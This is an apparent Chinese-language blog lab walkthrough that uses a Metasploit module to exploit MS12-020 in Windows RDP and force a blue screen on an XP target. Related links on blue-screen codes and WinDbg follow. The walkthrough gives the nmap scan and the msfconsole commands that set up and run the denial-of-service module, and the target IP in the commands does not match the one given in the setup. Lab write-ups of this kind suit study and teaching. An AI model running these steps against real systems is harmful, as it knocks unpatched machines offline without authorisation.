MS12-020漏洞的利用(死亡蓝屏)

news/2024/11/29 20:48:47/

漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞

介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。

实验环境:

        攻击机(kali):IP地址 192.168.1.100

        目标机(xp):IP地址 192.168.1.2

实验注意事项:

目标机3389端口必须开放,攻击机与目标机必须在同一局域网下,目标机防火墙必须关闭,目标机没有安装ms12-020漏洞补丁。

  1. 用kali自带的nmap工具查看目标机端口开放情况。

  Nmap  192.168.1.200  (查询192.168.1.200这个IP的端口开放情况)

发现目标机3389端口开放,这样就可以利用ms12-020漏洞进行攻击了

2.启动msfconsole工具,并查看ms12-020漏洞利用的攻击模块。

   Msfconsole    (一种渗透专用的框架)

   Search ms12-020  (查询ms12-020漏洞可利用的攻击模块)

查询到ms12-020漏洞,有俩个可以利用的模块。

3.使用其中任意一个攻击模块,然后配置其参数。

 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids (使用这个攻击模块)

 Show options (查看需要配置的参数)

 Set rhost 192.168.1.200  (设置需要攻击的目标ip)

 Show options  (查看参数是否配置成功,这里很明显是配置成功了)

4.运行配置好的模块

   run   (运行)

查看到出现seems down 表示攻击成功,已经致使目标机蓝屏了。

实验结果截图:


http://www.ppmy.cn/news/444980.html

相关文章

PC电脑端常见蓝屏代码自检测与解决方案

PC电脑端常见蓝屏代码自检测与解决方案 我将常见的电脑蓝屏情况都收集了一下,进行了整理,希望对各位不会修电脑的妹子用得到,不要影响it大佬的时间,哈哈哈 1.0X0000000A 问题故障:软件性冲突问题 参考根源&#xff…

WinDbg分析蓝屏dump原因

大多数人或许都经历过系统蓝屏问题,然而大多数人不清楚该怎么处理蓝屏问题,这里主要对系统蓝屏做一些解释,同时介绍下蓝屏问题分析工具WinDbg分析蓝屏问题的一般步骤。 微软官方对蓝屏的定义是,当系统遇到一些可能会威胁系统安全的情况时,系统会停止工作,这时的状态(即蓝…

MS12-020漏洞复现(死亡蓝屏)

实验环境: 攻击机kali IP:192.168.32.128 靶机windows server 2008 IP:192.168.32.132 1、了解windows server2008虚拟机的基本信息检查是否安装有关该漏洞的补丁 使用systeminfo命令查看: 通过该页面可知:虚拟机w…

常见电脑蓝屏代码以及解决办法

在我们使用电脑的过程中,最讨厌的一种颜色那便是“蓝色”了,有时候那突如其来的蓝屏简直让人崩溃。其实,电脑蓝屏也算是常见现象。造成电脑蓝屏的因素有很多,今天我将针对电脑常见的蓝屏给出相应的解决方案,希望对大家…

常见蓝屏代码解释及解决方法

蓝屏代码解释及解决方法 小云因为常遇到电脑蓝屏情况,今天就来整理一下部分常见的蓝屏代码分析及解决方法。 1、蓝屏代码 文字说明:IRQL-NOT-LESS-OR-EQVAL 通常的原因:驱动程序使用了不正确的内存地址。 解决方法:重新启动计…

windows蓝屏dump分析方法

 一、WinDbg是什么?它能做什么? WinDbg是在windows平台下,强大的用户态和内核态调试工具。它能够通过dmp文件轻松的定位到问题根源,可用于分析蓝屏、程序崩溃(IE崩溃)原因&#xf…

WinDbg蓝屏分析入门

一、WinDbg介绍 WinDbg,英文全称为Windows Debugger,Windows调试程序。 WinDbg是Windows平台下面的一款调试工具,通过dmp文件对蓝屏、程序崩溃原因进行分析,定位问题根源。官方描述WinDbg功能为以下三点: 调试内核模式…

Windows蓝屏代码大全及解决提示

知识点分析: 电脑出现蓝屏现象时,由于导致蓝屏现象的原因较多,建议先通过此款软件进行分析,简单确定蓝屏原因。 操作步骤: BlueScreenView不需要任何安装过程或额外的DLL文件,只需运行可执行文件 BlueScreenView.exe就可以了。Blu…